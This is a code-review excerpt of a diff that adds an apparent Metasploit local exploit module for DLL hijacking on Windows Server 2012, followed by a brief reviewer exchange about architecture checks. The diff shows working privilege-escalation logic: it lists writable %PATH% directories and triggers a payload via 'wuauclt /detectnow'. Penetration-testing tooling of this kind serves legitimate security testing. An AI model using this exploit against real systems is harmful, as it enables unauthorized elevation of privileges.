modules/exploits/windows/local/srclient_dll_hijacking.rb

```diff
@@ -0,0 +1,329 @@
+
+        # if we are here, we found a %PATH% directory we can write to!!!
+        writable_path_dirs << pdir unless writable_path_dirs.include?(pdir)
+      end
+    end
+
+    vprint_status('')
+
+    writable_path_dirs
+  end
+
+  def exploitation_message(trigger_cmd)
+    if trigger_cmd == 'wuauclt /detectnow'
+      print_status("Trying to trigger the payload in the background via the shell command `#{trigger_cmd}`")
+    else
+      print_status("Trying to trigger the payload via the shell command `#{trigger_cmd}`")
+    end
+  end
+
+  def check
+    # check OS
+    unless sysinfo['OS'].include?('2012')
+      return Exploit::CheckCode::Safe('Target is not Windows Server 2012.')
+    end
+
+    if sysinfo['OS'].include?('R2')
+      return Exploit::CheckCode::Safe('Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.')
+    end
+
+    print_status("Target is #{sysinfo['OS']}")
+
+    # get groups for the current user, this is necessary to verify write permissions
+    current_user = session.sys.config.getuid
+    user_groups = grab_user_groups(current_user)
+
+    # get %PATH% dirs and check if the current user can write to them
+    print_status('Checking for writable directories in %PATH%...')
+    path_dirs = get_envs('PATH')
+
+    if path_dirs.blank? || path_dirs['PATH'].blank?
+      get_path_fail_message = 'Failed to obtain %PATH% directories.'
+      unless provided_path_dir.blank?
+        get_path_fail_message << force_exploit_message
+      end
+      return Exploit::CheckCode::Unknown(get_path_fail_message)
+    end
+
+    @writable_path_dirs = enumerate_writable_path_dirs(path_dirs, user_groups, current_user)
+
+    writable_path_dirs_fail_message = "#{current_user} does not seem to have write permissions to any of the %PATH% directories"
+
+    if @writable_path_dirs.empty?
+      unless provided_path_dir.blank?
+        writable_path_dirs_fail_message << force_exploit_message
+      end
+      return Exploit::CheckCode::Safe(writable_path_dirs_fail_message)
+    end
+
+    if provided_path_dir.blank?
+      print_good("#{current_user} has write permissions to the following %PATH% directories:")
+      print_status('')
+      @writable_path_dirs.each { |wpd| print_status("\t#{wpd}") }
+      print_status('')
+    else
+      print_good("#{current_user} has write permissions to #{provided_path_dir}")
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['Architecture'] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
```

Comment:
I do not believe there is such a thing as Windows 2012 x86.  I recall that all Windows Server OSs starting with 2008R2 were x64.  You should just be able to check if this is an x64 payload and windows 2012 and be done.

Reply:
Good point, I removed the unnecessary checks now and added an explicit one for the payload arch.